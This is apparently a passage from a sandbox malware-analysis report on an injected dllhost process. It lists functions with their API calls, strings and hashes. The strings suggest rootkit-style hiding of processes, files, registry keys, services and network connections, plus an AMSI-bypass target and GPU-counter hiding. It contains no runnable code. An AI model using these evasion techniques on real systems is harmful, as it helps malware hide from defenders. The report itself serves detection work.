Part of subcall function 00000279A92A12B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000279A92A1315
Part of subcall function 00000279A92A12B8: GetProcessHeap.KERNEL32 ref: 00000279A92A1323
Part of subcall function 00000279A92A12B8: HeapAlloc.KERNEL32 ref: 00000279A92A1334
Part of subcall function 00000279A92A12B8: RegEnumValueW.ADVAPI32 ref: 00000279A92A1393
Part of subcall function 00000279A92A12B8: GetProcessHeap.KERNEL32 ref: 00000279A92A13DB
Part of subcall function 00000279A92A12B8: HeapAlloc.KERNEL32 ref: 00000279A92A13E9
Part of subcall function 00000279A92A12B8: GetProcessHeap.KERNEL32 ref: 00000279A92A1406
Part of subcall function 00000279A92A12B8: HeapFree.KERNEL32 ref: 00000279A92A1414
Part of subcall function 00000279A92A12B8: lstrlenW.KERNEL32 ref: 00000279A92A141D
Part of subcall function 00000279A92A12B8: GetProcessHeap.KERNEL32 ref: 00000279A92A142B
Part of subcall function 00000279A92A12B8: HeapAlloc.KERNEL32 ref: 00000279A92A1439

Strings

udp, xrefs: 00000279A92A1970
process_names, xrefs: 00000279A92A1849
startup, xrefs: 00000279A92A17D1
service_names, xrefs: 00000279A92A18BF
SOFTWARE\$cnt-config, xrefs: 00000279A92A178E
paths, xrefs: 00000279A92A1884
tcp_local, xrefs: 00000279A92A18FA
tcp_remote, xrefs: 00000279A92A1935
pid, xrefs: 00000279A92A180E

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2609720707
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 00a9c684c7b30d5a74dffd76b5fc041a9779bb712e4558cfc1c74f24b3dd756f
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: F6714F3B31AB5489EB10DF25E898A9D33B4FB89BA8F465121DE4E57B69DF34C484C340

Function 00000279A9271E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000279A9271E7F

Part of subcall function 00000279A92722A8: GetModuleHandleA.KERNEL32(?,?,?,00000279A9271EB1), ref: 00000279A92722C0
Part of subcall function 00000279A92722A8: GetProcAddress.KERNEL32(?,?,?,00000279A9271EB1), ref: 00000279A92722D1

CreateThread.KERNEL32 ref: 00000279A9272043
TlsAlloc.KERNEL32 ref: 00000279A9272049
TlsAlloc.KERNEL32 ref: 00000279A9272055
TlsAlloc.KERNEL32 ref: 00000279A9272061
TlsAlloc.KERNEL32 ref: 00000279A927206D
TlsAlloc.KERNEL32 ref: 00000279A9272079
TlsAlloc.KERNEL32 ref: 00000279A9272085

Strings

pdh.dll, xrefs: 00000279A9271FD7, 00000279A9271FF8
amsi.dll, xrefs: 00000279A9272019
NtResumeThread, xrefs: 00000279A9271EC2
NtQueryDirectoryFile, xrefs: 00000279A9271EDF
NtQuerySystemInformation, xrefs: 00000279A9271EA5
NtEnumerateValueKey, xrefs: 00000279A9271F36
advapi32.dll, xrefs: 00000279A9271F57, 00000279A9271F78
NtEnumerateKey, xrefs: 00000279A9271F19
ntdll.dll, xrefs: 00000279A9271E8D
NtQueryDirectoryFileEx, xrefs: 00000279A9271EFC
EnumServiceGroupW, xrefs: 00000279A9271F50
EnumServicesStatusExW, xrefs: 00000279A9271F71, 00000279A9271F92
NtDeviceIoControlFile, xrefs: 00000279A9271FB6
PdhGetFormattedCounterArrayW, xrefs: 00000279A9271FF1
AmsiScanBuffer, xrefs: 00000279A9272012
sechost.dll, xrefs: 00000279A9271F99
PdhGetRawCounterArrayW, xrefs: 00000279A9271FD0

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: a642429306fadcb36ed49255003d2077e1bee25b7b6f182b40a733f0a74b1571
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: B0517E6551AB4AADFB00EF69EC8D7D43320BB84764F828523DC0D22966DF7882DAC341

Function 00000279A92A1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000279A92A1E7F

Part of subcall function 00000279A92A22A8: GetModuleHandleA.KERNEL32(?,?,?,00000279A92A1EB1), ref: 00000279A92A22C0
Part of subcall function 00000279A92A22A8: GetProcAddress.KERNEL32(?,?,?,00000279A92A1EB1), ref: 00000279A92A22D1

CreateThread.KERNEL32 ref: 00000279A92A2043
TlsAlloc.KERNEL32 ref: 00000279A92A2049
TlsAlloc.KERNEL32 ref: 00000279A92A2055
TlsAlloc.KERNEL32 ref: 00000279A92A2061
TlsAlloc.KERNEL32 ref: 00000279A92A206D
TlsAlloc.KERNEL32 ref: 00000279A92A2079
TlsAlloc.KERNEL32 ref: 00000279A92A2085

Strings

PdhGetRawCounterArrayW, xrefs: 00000279A92A1FD0
advapi32.dll, xrefs: 00000279A92A1F57, 00000279A92A1F78
NtQueryDirectoryFileEx, xrefs: 00000279A92A1EFC
amsi.dll, xrefs: 00000279A92A2019
NtEnumerateKey, xrefs: 00000279A92A1F19
ntdll.dll, xrefs: 00000279A92A1E8D
NtResumeThread, xrefs: 00000279A92A1EC2
NtQueryDirectoryFile, xrefs: 00000279A92A1EDF
NtQuerySystemInformation, xrefs: 00000279A92A1EA5
EnumServiceGroupW, xrefs: 00000279A92A1F50
NtDeviceIoControlFile, xrefs: 00000279A92A1FB6
sechost.dll, xrefs: 00000279A92A1F99
EnumServicesStatusExW, xrefs: 00000279A92A1F71, 00000279A92A1F92
NtEnumerateValueKey, xrefs: 00000279A92A1F36
PdhGetFormattedCounterArrayW, xrefs: 00000279A92A1FF1
pdh.dll, xrefs: 00000279A92A1FD7, 00000279A92A1FF8
AmsiScanBuffer, xrefs: 00000279A92A2012

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: f3c268bc9fe8c5d20f36ff3f55ef6961ae8679e312a569bdc6c3b7a4de25a447
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 9C51A26551AB4AADFB00EF68EC9D7D43360FB54375F820523AC0E06976DE3886DAC351

Function 00000279A92712B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000279A9271315
GetProcessHeap.KERNEL32 ref: 00000279A9271323
HeapAlloc.KERNEL32 ref: 00000279A9271334
RegEnumValueW.ADVAPI32 ref: 00000279A9271393

Part of subcall function 00000279A9271530: StrCmpIW.SHLWAPI ref: 00000279A9271561

GetProcessHeap.KERNEL32 ref: 00000279A92713DB
HeapAlloc.KERNEL32 ref: 00000279A92713E9
GetProcessHeap.KERNEL32 ref: 00000279A9271406
HeapFree.KERNEL32 ref: 00000279A9271414
lstrlenW.KERNEL32 ref: 00000279A927141D
GetProcessHeap.KERNEL32 ref: 00000279A927142B
HeapAlloc.KERNEL32 ref: 00000279A9271439
StrCpyW.SHLWAPI ref: 00000279A927145B
GetProcessHeap.KERNEL32 ref: 00000279A9271472
HeapFree.KERNEL32 ref: 00000279A9271480

Strings

d, xrefs: 00000279A9271356

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 17681605820242942e7001277f7a4d29f71c619d0e52f1e48071c8d5ed8c163b
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: F0516F3621AB849AE724CF62E85875AB7A1F789FA8F458124DE4D07758EF3CC089C700

Function 00000279A92A12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000279A92A1315
GetProcessHeap.KERNEL32 ref: 00000279A92A1323
HeapAlloc.KERNEL32 ref: 00000279A92A1334
RegEnumValueW.ADVAPI32 ref: 00000279A92A1393

Part of subcall function 00000279A92A1530: StrCmpIW.SHLWAPI ref: 00000279A92A1561

GetProcessHeap.KERNEL32 ref: 00000279A92A13DB
HeapAlloc.KERNEL32 ref: 00000279A92A13E9
GetProcessHeap.KERNEL32 ref: 00000279A92A1406
HeapFree.KERNEL32 ref: 00000279A92A1414
lstrlenW.KERNEL32 ref: 00000279A92A141D
GetProcessHeap.KERNEL32 ref: 00000279A92A142B
HeapAlloc.KERNEL32 ref: 00000279A92A1439
StrCpyW.SHLWAPI ref: 00000279A92A145B
GetProcessHeap.KERNEL32 ref: 00000279A92A1472
HeapFree.KERNEL32 ref: 00000279A92A1480

Strings

d, xrefs: 00000279A92A1356

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 1ca63df4ed55ab6f973c19076e8d116ccd9446a1aab6db60aac1e9ddaf33533f
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: BA513A36219B849AE764CF66E84C75A77E1F789FA8F454124DE4E07B68DF3CC0898700

Function 00000279A927EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000279A927F34A,?,?,00000000,00000279A927F2CD), ref: 00000279A927EFF5
GetLastError.KERNEL32(?,?,00000000,00000279A927F2CD), ref: 00000279A927F007
LoadLibraryExW.KERNEL32(?,?,00000000,00000279A927F2CD), ref: 00000279A927F049
VirtualProtect.KERNEL32 ref: 00000279A927F0A5
VirtualProtect.KERNEL32 ref: 00000279A927F0D6
FreeLibrary.KERNEL32(?,?,00000000,00000279A927F2CD), ref: 00000279A927F11A
GetProcAddress.KERNEL32(?,?,00000000,00000279A927F2CD), ref: 00000279A927F126

Strings

api-ms-, xrefs: 00000279A927F01B
AppPolicyGetProcessTerminationMethod, xrefs: 00000279A927F157, 00000279A927F165
ext-ms-, xrefs: 00000279A927F02E

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: cf4b9fd1faf2b228bb9fcc891e81f1d88939b55e4c39022a81b9dc6e763bf395
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 6651FE2170FB1499FF249F26A8087AA2390BB48BB0F5A47249E3D677D4EF38C485C750

Function 00000279A92AEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000279A92AF34A,?,?,00000000,00000279A92AF2CD), ref: 00000279A92AEFF5
GetLastError.KERNEL32(?,?,00000000,00000279A92AF2CD), ref: 00000279A92AF007
LoadLibraryExW.KERNEL32(?,?,00000000,00000279A92AF2CD), ref: 00000279A92AF049
VirtualProtect.KERNEL32 ref: 00000279A92AF0A5
VirtualProtect.KERNEL32 ref: 00000279A92AF0D6
FreeLibrary.KERNEL32(?,?,00000000,00000279A92AF2CD), ref: 00000279A92AF11A
GetProcAddress.KERNEL32(?,?,00000000,00000279A92AF2CD), ref: 00000279A92AF126

Strings

api-ms-, xrefs: 00000279A92AF01B
ext-ms-, xrefs: 00000279A92AF02E
AppPolicyGetProcessTerminationMethod, xrefs: 00000279A92AF157, 00000279A92AF165

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: e7a0ee0770d191a760ea4b3cd29ffb016bdfc6dc188c86059420d47bbaca2541
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: C851E12270B71489EF159B16A80C7A92390BB58BB0F5A0B259E3E47BD4EF3CC485C740

Function 00000279A92733A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000279A92733FD
GetProcessHeap.KERNEL32 ref: 00000279A9273412
HeapAlloc.KERNEL32 ref: 00000279A9273420
PdhGetCounterInfoW.PDH ref: 00000279A9273436
StrCmpW.SHLWAPI ref: 00000279A927344B

Part of subcall function 00000279A9273950: StrCmpNW.SHLWAPI ref: 00000279A9273972
Part of subcall function 00000279A9273950: StrStrW.SHLWAPI ref: 00000279A9273990
Part of subcall function 00000279A9273950: StrToIntW.SHLWAPI ref: 00000279A92739B7

GetProcessHeap.KERNEL32 ref: 00000279A9273488
HeapFree.KERNEL32 ref: 00000279A9273496

Strings

\GPU Engine(*)\Running Time, xrefs: 00000279A9273444

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 41c442bdbf69b5b40bd8a313562a5301532673e8b9598099d0eacbe4d71dda6e
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 1031A522609B509EEB35DF12B84C799B3A0F788BE5F464525DE4D63624DF3CC49A8740

Function 00000279A92A33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000279A92A33FD
GetProcessHeap.KERNEL32 ref: 00000279A92A3412
HeapAlloc.KERNEL32 ref: 00000279A92A3420
PdhGetCounterInfoW.PDH ref: 00000279A92A3436
StrCmpW.SHLWAPI ref: 00000279A92A344B

Part of subcall function 00000279A92A3950: StrCmpNW.SHLWAPI ref: 00000279A92A3972
Part of subcall function 00000279A92A3950: StrStrW.SHLWAPI ref: 00000279A92A3990
Part of subcall function 00000279A92A3950: StrToIntW.SHLWAPI ref: 00000279A92A39B7

GetProcessHeap.KERNEL32 ref: 00000279A92A3488
HeapFree.KERNEL32 ref: 00000279A92A3496

Strings

\GPU Engine(*)\Running Time, xrefs: 00000279A92A3444

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 57d12a3365b6e07ed0e95a8fa90399dcc80eb5b0e41324388e31b4079b09a1b1
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 7B31D223A19B819EEB31DF12A84C759A3E0F788BE5F460525DE4E47A34DF3CD49A8340

Function 00000279A92734B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000279A9273516
GetProcessHeap.KERNEL32 ref: 00000279A9273527
HeapAlloc.KERNEL32 ref: 00000279A9273535
PdhGetCounterInfoW.PDH ref: 00000279A927354B
StrCmpW.SHLWAPI ref: 00000279A9273560

Part of subcall function 00000279A9273950: StrCmpNW.SHLWAPI ref: 00000279A9273972
Part of subcall function 00000279A9273950: StrStrW.SHLWAPI ref: 00000279A9273990
Part of subcall function 00000279A9273950: StrToIntW.SHLWAPI ref: 00000279A92739B7

GetProcessHeap.KERNEL32 ref: 00000279A927358D
HeapFree.KERNEL32 ref: 00000279A927359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 00000279A9273559

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 2e179f4c9f39d4e2f2fe1cb8faeb430fafffdca9eb9b8c0453aed5868486359b
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 30317436619B418EE760DF22B888B5973E1F788FA5F468125DE4E63724EF38C485C700

Function 00000279A92A34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000279A92A3516
GetProcessHeap.KERNEL32 ref: 00000279A92A3527
HeapAlloc.KERNEL32 ref: 00000279A92A3535
PdhGetCounterInfoW.PDH ref: 00000279A92A354B
StrCmpW.SHLWAPI ref: 00000279A92A3560

Part of subcall function 00000279A92A3950: StrCmpNW.SHLWAPI ref: 00000279A92A3972
Part of subcall function 00000279A92A3950: StrStrW.SHLWAPI ref: 00000279A92A3990
Part of subcall function 00000279A92A3950: StrToIntW.SHLWAPI ref: 00000279A92A39B7

GetProcessHeap.KERNEL32 ref: 00000279A92A358D
HeapFree.KERNEL32 ref: 00000279A92A359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 00000279A92A3559

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 2f9c640d9fa439e7ce8e3ee15a8fa47b1f5083edea71d86122f4fbe25f9f2871
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 34318636A19B418EE760DF26A88CB5973E1F788FA4F464125DE4E47B24DF38D495C700

Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0000000140002192
SysAllocString.OLEAUT32 ref: 00000001400021A2
CoInitializeEx.OLE32 ref: 00000001400021AF
CoInitializeSecurity.OLE32 ref: 00000001400021E6
CoCreateInstance.OLE32 ref: 0000000140002226
VariantInit.OLEAUT32 ref: 0000000140002238
CoUninitialize.OLE32 ref: 00000001400022D2
SysFreeString.OLEAUT32 ref: 00000001400022DB
SysFreeString.OLEAUT32 ref: 00000001400022E4

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID:
API String ID: 4184240511-0
Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304

Function 00000279A924962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

